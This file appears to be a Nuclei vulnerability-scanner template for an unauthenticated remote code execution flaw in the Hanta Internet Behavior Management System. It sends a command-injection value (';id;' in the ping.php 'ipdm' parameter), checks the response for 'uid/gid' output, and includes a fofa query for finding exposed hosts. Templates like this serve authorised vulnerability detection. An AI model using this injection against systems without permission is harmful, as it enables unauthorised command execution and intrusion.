nuclei-templates/http/vulnerabilities/other/hanta-rce.yaml

33 lines
636 B
YAML

id: hanta-rce
info:
name: Hanta Internet Behavior Management System - Remote Code Execution
author: momika233
severity: high
metadata:
max-request: 1
verified: true
fofa-query: app="汉塔科技上网行为管理系统"
tags: hanta,rce,unauth
http:
- method: GET
path:
- "{{BaseURL}}/dgn/dgn_tools/ping.php?ipdm=2;id;"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200